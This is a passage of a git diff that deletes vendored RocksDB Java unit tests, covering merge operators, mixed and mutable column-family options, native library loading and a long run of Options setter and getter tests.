-          .setCreateMissingColumnFamilies(true);
-           final RocksDB db = RocksDB.open(opt,
-               dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-               columnFamilyHandleList)) {
-        try {
-          // writing aa under key
-          db.put(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "aa".getBytes());
-          // merge bb under key
-          db.merge(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "bb".getBytes());
-
-          byte[] value = db.get(columnFamilyHandleList.get(1),
-              "cfkey".getBytes());
-          String strValue = new String(value);
-          assertThat(strValue).isEqualTo("aa,bb");
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandleList) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void operatorOption()
-      throws InterruptedException, RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final Options opt = new Options()
-            .setCreateIfMissing(true)
-            .setMergeOperator(stringAppendOperator);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // Writing aa under key
-      db.put("key".getBytes(), "aa".getBytes());
-
-      // Writing bb under key
-      db.merge("key".getBytes(), "bb".getBytes());
-
-      final byte[] value = db.get("key".getBytes());
-      final String strValue = new String(value);
-
-      assertThat(strValue).isEqualTo("aa,bb");
-    }
-  }
-
-  @Test
-  public void cFOperatorOption()
-      throws InterruptedException, RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final ColumnFamilyOptions cfOpt1 = new ColumnFamilyOptions()
-             .setMergeOperator(stringAppendOperator);
-         final ColumnFamilyOptions cfOpt2 = new ColumnFamilyOptions()
-             .setMergeOperator(stringAppendOperator)
-    ) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpt1),
-          new ColumnFamilyDescriptor("new_cf".getBytes(), cfOpt2)
-      );
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final DBOptions opt = new DBOptions()
-          .setCreateIfMissing(true)
-          .setCreateMissingColumnFamilies(true);
-           final RocksDB db = RocksDB.open(opt,
-               dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-               columnFamilyHandleList)
-      ) {
-        try {
-          // writing aa under key
-          db.put(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "aa".getBytes());
-          // merge bb under key
-          db.merge(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "bb".getBytes());
-          byte[] value = db.get(columnFamilyHandleList.get(1),
-              "cfkey".getBytes());
-          String strValue = new String(value);
-
-          // Test also with createColumnFamily
-          try (final ColumnFamilyOptions cfHandleOpts =
-                   new ColumnFamilyOptions()
-                       .setMergeOperator(stringAppendOperator);
-               final ColumnFamilyHandle cfHandle =
-                   db.createColumnFamily(
-                       new ColumnFamilyDescriptor("new_cf2".getBytes(),
-                           cfHandleOpts))
-          ) {
-            // writing xx under cfkey2
-            db.put(cfHandle, "cfkey2".getBytes(), "xx".getBytes());
-            // merge yy under cfkey2
-            db.merge(cfHandle, new WriteOptions(), "cfkey2".getBytes(),
-                "yy".getBytes());
-            value = db.get(cfHandle, "cfkey2".getBytes());
-            String strValueTmpCf = new String(value);
-
-            assertThat(strValue).isEqualTo("aa,bb");
-            assertThat(strValueTmpCf).isEqualTo("xx,yy");
-          }
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              columnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void operatorGcBehaviour()
-      throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator()) {
-      try (final Options opt = new Options()
-              .setCreateIfMissing(true)
-              .setMergeOperator(stringAppendOperator);
-           final RocksDB db = RocksDB.open(opt,
-                   dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-
-
-      // test reuse
-      try (final Options opt = new Options()
-              .setMergeOperator(stringAppendOperator);
-           final RocksDB db = RocksDB.open(opt,
-                   dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-
-      // test param init
-      try (final StringAppendOperator stringAppendOperator2 = new StringAppendOperator();
-           final Options opt = new Options()
-              .setMergeOperator(stringAppendOperator2);
-           final RocksDB db = RocksDB.open(opt,
-                   dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-
-      // test replace one with another merge operator instance
-      try (final Options opt = new Options()
-              .setMergeOperator(stringAppendOperator);
-           final StringAppendOperator newStringAppendOperator = new StringAppendOperator()) {
-        opt.setMergeOperator(newStringAppendOperator);
-        try (final RocksDB db = RocksDB.open(opt,
-                dbFolder.getRoot().getAbsolutePath())) {
-          //no-op
-        }
-      }
-    }
-  }
-
-  @Test
-  public void emptyStringInSetMergeOperatorByName() {
-    try (final Options opt = new Options()
-        .setMergeOperatorName("");
-         final ColumnFamilyOptions cOpt = new ColumnFamilyOptions()
-             .setMergeOperatorName("")) {
-      //no-op
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void nullStringInSetMergeOperatorByNameOptions() {
-    try (final Options opt = new Options()) {
-      opt.setMergeOperatorName(null);
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void
-  nullStringInSetMergeOperatorByNameColumnFamilyOptions() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      opt.setMergeOperatorName(null);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MixedOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MixedOptionsTest.java
deleted file mode 100644
index ff68b1b..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MixedOptionsTest.java
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MixedOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void mixedOptionsTest(){
-    // Set a table factory and check the names
-    try(final Filter bloomFilter = new BloomFilter();
-        final ColumnFamilyOptions cfOptions = new ColumnFamilyOptions()
-            .setTableFormatConfig(
-                new BlockBasedTableConfig().setFilter(bloomFilter))
-    ) {
-      assertThat(cfOptions.tableFactoryName()).isEqualTo(
-          "BlockBasedTable");
-      cfOptions.setTableFormatConfig(new PlainTableConfig());
-      assertThat(cfOptions.tableFactoryName()).isEqualTo("PlainTable");
-      // Initialize a dbOptions object from cf options and
-      // db options
-      try (final DBOptions dbOptions = new DBOptions();
-           final Options options = new Options(dbOptions, cfOptions)) {
-        assertThat(options.tableFactoryName()).isEqualTo("PlainTable");
-        // Free instances
-      }
-    }
-
-    // Test Optimize for statements
-    try(final ColumnFamilyOptions cfOptions = new ColumnFamilyOptions()) {
-    cfOptions.optimizeUniversalStyleCompaction();
-    cfOptions.optimizeLevelStyleCompaction();
-    cfOptions.optimizeForPointLookup(1024);
-    try(final Options options = new Options()) {
-        options.optimizeLevelStyleCompaction();
-        options.optimizeLevelStyleCompaction(400);
-        options.optimizeUniversalStyleCompaction();
-        options.optimizeUniversalStyleCompaction(400);
-        options.optimizeForPointLookup(1024);
-        options.prepareForBulkLoad();
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
deleted file mode 100644
index f631905..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
+++ /dev/null
@@ -1,88 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.Test;
-import org.rocksdb.MutableColumnFamilyOptions.MutableColumnFamilyOptionsBuilder;
-
-import java.util.NoSuchElementException;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MutableColumnFamilyOptionsTest {
-
-  @Test
-  public void builder() {
-    final MutableColumnFamilyOptionsBuilder builder =
-        MutableColumnFamilyOptions.builder();
-        builder
-            .setWriteBufferSize(10)
-            .setInplaceUpdateNumLocks(5)
-            .setDisableAutoCompactions(true)
-            .setParanoidFileChecks(true);
-
-    assertThat(builder.writeBufferSize()).isEqualTo(10);
-    assertThat(builder.inplaceUpdateNumLocks()).isEqualTo(5);
-    assertThat(builder.disableAutoCompactions()).isEqualTo(true);
-    assertThat(builder.paranoidFileChecks()).isEqualTo(true);
-  }
-
-  @Test(expected = NoSuchElementException.class)
-  public void builder_getWhenNotSet() {
-    final MutableColumnFamilyOptionsBuilder builder =
-        MutableColumnFamilyOptions.builder();
-
-    builder.writeBufferSize();
-  }
-
-  @Test
-  public void builder_build() {
-    final MutableColumnFamilyOptions options = MutableColumnFamilyOptions
-        .builder()
-          .setWriteBufferSize(10)
-          .setParanoidFileChecks(true)
-          .build();
-
-    assertThat(options.getKeys().length).isEqualTo(2);
-    assertThat(options.getValues().length).isEqualTo(2);
-    assertThat(options.getKeys()[0])
-        .isEqualTo(
-            MutableColumnFamilyOptions.MemtableOption.write_buffer_size.name());
-    assertThat(options.getValues()[0]).isEqualTo("10");
-    assertThat(options.getKeys()[1])
-        .isEqualTo(
-            MutableColumnFamilyOptions.MiscOption.paranoid_file_checks.name());
-    assertThat(options.getValues()[1]).isEqualTo("true");
-  }
-
-  @Test
-  public void mutableColumnFamilyOptions_toString() {
-    final String str = MutableColumnFamilyOptions
-        .builder()
-        .setWriteBufferSize(10)
-        .setInplaceUpdateNumLocks(5)
-        .setDisableAutoCompactions(true)
-        .setParanoidFileChecks(true)
-        .build()
-        .toString();
-
-    assertThat(str).isEqualTo("write_buffer_size=10;inplace_update_num_locks=5;"
-        + "disable_auto_compactions=true;paranoid_file_checks=true");
-  }
-
-  @Test
-  public void mutableColumnFamilyOptions_parse() {
-    final String str = "write_buffer_size=10;inplace_update_num_locks=5;"
-        + "disable_auto_compactions=true;paranoid_file_checks=true";
-
-    final MutableColumnFamilyOptionsBuilder builder =
-        MutableColumnFamilyOptions.parse(str);
-
-    assertThat(builder.writeBufferSize()).isEqualTo(10);
-    assertThat(builder.inplaceUpdateNumLocks()).isEqualTo(5);
-    assertThat(builder.disableAutoCompactions()).isEqualTo(true);
-    assertThat(builder.paranoidFileChecks()).isEqualTo(true);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
deleted file mode 100644
index ab60081..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.rocksdb.util.Environment;
-
-import java.io.File;
-import java.io.IOException;
-import java.nio.file.*;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class NativeLibraryLoaderTest {
-
-  @Rule
-  public TemporaryFolder temporaryFolder = new TemporaryFolder();
-
-  @Test
-  public void tempFolder() throws IOException {
-    NativeLibraryLoader.getInstance().loadLibraryFromJarToTemp(
-        temporaryFolder.getRoot().getAbsolutePath());
-    final Path path = Paths.get(temporaryFolder.getRoot().getAbsolutePath(),
-        Environment.getJniLibraryFileName("rocksdb"));
-    assertThat(Files.exists(path)).isTrue();
-    assertThat(Files.isReadable(path)).isTrue();
-  }
-
-  @Test
-  public void overridesExistingLibrary() throws IOException {
-    File first = NativeLibraryLoader.getInstance().loadLibraryFromJarToTemp(
-        temporaryFolder.getRoot().getAbsolutePath());
-    NativeLibraryLoader.getInstance().loadLibraryFromJarToTemp(
-        temporaryFolder.getRoot().getAbsolutePath());
-    assertThat(first.exists()).isTrue();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/OptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/OptionsTest.java
deleted file mode 100644
index 6afcab3..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/OptionsTest.java
+++ /dev/null
@@ -1,1095 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Paths;
-import java.util.ArrayList;
-import java.util.Collections;
-import java.util.List;
-import java.util.Random;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class OptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void setIncreaseParallelism() {
-    try (final Options opt = new Options()) {
-      final int threads = Runtime.getRuntime().availableProcessors() * 2;
-      opt.setIncreaseParallelism(threads);
-    }
-  }
-
-  @Test
-  public void writeBufferSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteBufferSize(longValue);
-      assertThat(opt.writeBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumber() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxWriteBufferNumber(intValue);
-      assertThat(opt.maxWriteBufferNumber()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void minWriteBufferNumberToMerge() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMinWriteBufferNumberToMerge(intValue);
-      assertThat(opt.minWriteBufferNumberToMerge()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void numLevels() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setNumLevels(intValue);
-      assertThat(opt.numLevels()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroFileNumCompactionTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroFileNumCompactionTrigger(intValue);
-      assertThat(opt.levelZeroFileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroSlowdownWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroSlowdownWritesTrigger(intValue);
-      assertThat(opt.levelZeroSlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroStopWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroStopWritesTrigger(intValue);
-      assertThat(opt.levelZeroStopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeBase() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setTargetFileSizeBase(longValue);
-      assertThat(opt.targetFileSizeBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeMultiplier() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setTargetFileSizeMultiplier(intValue);
-      assertThat(opt.targetFileSizeMultiplier()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelBase() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxBytesForLevelBase(longValue);
-      assertThat(opt.maxBytesForLevelBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void levelCompactionDynamicLevelBytes() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setLevelCompactionDynamicLevelBytes(boolValue);
-      assertThat(opt.levelCompactionDynamicLevelBytes())
-          .isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplier() {
-    try (final Options opt = new Options()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMaxBytesForLevelMultiplier(doubleValue);
-      assertThat(opt.maxBytesForLevelMultiplier()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplierAdditional() {
-    try (final Options opt = new Options()) {
-      final int intValue1 = rand.nextInt();
-      final int intValue2 = rand.nextInt();
-      final int[] ints = new int[]{intValue1, intValue2};
-      opt.setMaxBytesForLevelMultiplierAdditional(ints);
-      assertThat(opt.maxBytesForLevelMultiplierAdditional()).isEqualTo(ints);
-    }
-  }
-
-  @Test
-  public void maxCompactionBytes() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxCompactionBytes(longValue);
-      assertThat(opt.maxCompactionBytes()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void softPendingCompactionBytesLimit() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setSoftPendingCompactionBytesLimit(longValue);
-      assertThat(opt.softPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void hardPendingCompactionBytesLimit() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setHardPendingCompactionBytesLimit(longValue);
-      assertThat(opt.hardPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void level0FileNumCompactionTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0FileNumCompactionTrigger(intValue);
-      assertThat(opt.level0FileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0SlowdownWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0SlowdownWritesTrigger(intValue);
-      assertThat(opt.level0SlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0StopWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0StopWritesTrigger(intValue);
-      assertThat(opt.level0StopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void arenaBlockSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setArenaBlockSize(longValue);
-      assertThat(opt.arenaBlockSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void disableAutoCompactions() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDisableAutoCompactions(boolValue);
-      assertThat(opt.disableAutoCompactions()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxSequentialSkipInIterations() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSequentialSkipInIterations(longValue);
-      assertThat(opt.maxSequentialSkipInIterations()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateSupport() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setInplaceUpdateSupport(boolValue);
-      assertThat(opt.inplaceUpdateSupport()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateNumLocks() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setInplaceUpdateNumLocks(longValue);
-      assertThat(opt.inplaceUpdateNumLocks()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void memtablePrefixBloomSizeRatio() {
-    try (final Options opt = new Options()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMemtablePrefixBloomSizeRatio(doubleValue);
-      assertThat(opt.memtablePrefixBloomSizeRatio()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void memtableHugePageSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMemtableHugePageSize(longValue);
-      assertThat(opt.memtableHugePageSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void bloomLocality() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setBloomLocality(intValue);
-      assertThat(opt.bloomLocality()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSuccessiveMerges() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSuccessiveMerges(longValue);
-      assertThat(opt.maxSuccessiveMerges()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void optimizeFiltersForHits() {
-    try (final Options opt = new Options()) {
-      final boolean aBoolean = rand.nextBoolean();
-      opt.setOptimizeFiltersForHits(aBoolean);
-      assertThat(opt.optimizeFiltersForHits()).isEqualTo(aBoolean);
-    }
-  }
-
-  @Test
-  public void createIfMissing() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateIfMissing(boolValue);
-      assertThat(opt.createIfMissing()).
-          isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void createMissingColumnFamilies() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateMissingColumnFamilies(boolValue);
-      assertThat(opt.createMissingColumnFamilies()).
-          isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void errorIfExists() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setErrorIfExists(boolValue);
-      assertThat(opt.errorIfExists()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void paranoidChecks() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setParanoidChecks(boolValue);
-      assertThat(opt.paranoidChecks()).
-          isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxTotalWalSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxTotalWalSize(longValue);
-      assertThat(opt.maxTotalWalSize()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxOpenFiles() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxOpenFiles(intValue);
-      assertThat(opt.maxOpenFiles()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxFileOpeningThreads() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxFileOpeningThreads(intValue);
-      assertThat(opt.maxFileOpeningThreads()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void useFsync() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseFsync(boolValue);
-      assertThat(opt.useFsync()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbPaths() {
-    final List<DbPath> dbPaths = new ArrayList<>();
-    dbPaths.add(new DbPath(Paths.get("/a"), 10));
-    dbPaths.add(new DbPath(Paths.get("/b"), 100));
-    dbPaths.add(new DbPath(Paths.get("/c"), 1000));
-
-    try (final Options opt = new Options()) {
-      assertThat(opt.dbPaths()).isEqualTo(Collections.emptyList());
-
-      opt.setDbPaths(dbPaths);
-
-      assertThat(opt.dbPaths()).isEqualTo(dbPaths);
-    }
-  }
-
-  @Test
-  public void dbLogDir() {
-    try (final Options opt = new Options()) {
-      final String str = "path/to/DbLogDir";
-      opt.setDbLogDir(str);
-      assertThat(opt.dbLogDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void walDir() {
-    try (final Options opt = new Options()) {
-      final String str = "path/to/WalDir";
-      opt.setWalDir(str);
-      assertThat(opt.walDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void deleteObsoleteFilesPeriodMicros() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setDeleteObsoleteFilesPeriodMicros(longValue);
-      assertThat(opt.deleteObsoleteFilesPeriodMicros()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void baseBackgroundCompactions() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setBaseBackgroundCompactions(intValue);
-      assertThat(opt.baseBackgroundCompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundCompactions() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundCompactions(intValue);
-      assertThat(opt.maxBackgroundCompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSubcompactions() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxSubcompactions(intValue);
-      assertThat(opt.maxSubcompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundFlushes() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundFlushes(intValue);
-      assertThat(opt.maxBackgroundFlushes()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxLogFileSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxLogFileSize(longValue);
-      assertThat(opt.maxLogFileSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void logFileTimeToRoll() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setLogFileTimeToRoll(longValue);
-      assertThat(opt.logFileTimeToRoll()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void keepLogFileNum() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setKeepLogFileNum(longValue);
-      assertThat(opt.keepLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void recycleLogFileNum() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setRecycleLogFileNum(longValue);
-      assertThat(opt.recycleLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxManifestFileSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxManifestFileSize(longValue);
-      assertThat(opt.maxManifestFileSize()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void tableCacheNumshardbits() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setTableCacheNumshardbits(intValue);
-      assertThat(opt.tableCacheNumshardbits()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void walSizeLimitMB() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWalSizeLimitMB(longValue);
-      assertThat(opt.walSizeLimitMB()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walTtlSeconds() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWalTtlSeconds(longValue);
-      assertThat(opt.walTtlSeconds()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void manifestPreallocationSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setManifestPreallocationSize(longValue);
-      assertThat(opt.manifestPreallocationSize()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useDirectReads() {
-    try(final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectReads(boolValue);
-      assertThat(opt.useDirectReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectIoForFlushAndCompaction() {
-    try(final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectIoForFlushAndCompaction(boolValue);
-      assertThat(opt.useDirectIoForFlushAndCompaction()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowFAllocate() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowFAllocate(boolValue);
-      assertThat(opt.allowFAllocate()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapReads() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapReads(boolValue);
-      assertThat(opt.allowMmapReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapWrites() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapWrites(boolValue);
-      assertThat(opt.allowMmapWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void isFdCloseOnExec() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setIsFdCloseOnExec(boolValue);
-      assertThat(opt.isFdCloseOnExec()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void statsDumpPeriodSec() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setStatsDumpPeriodSec(intValue);
-      assertThat(opt.statsDumpPeriodSec()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
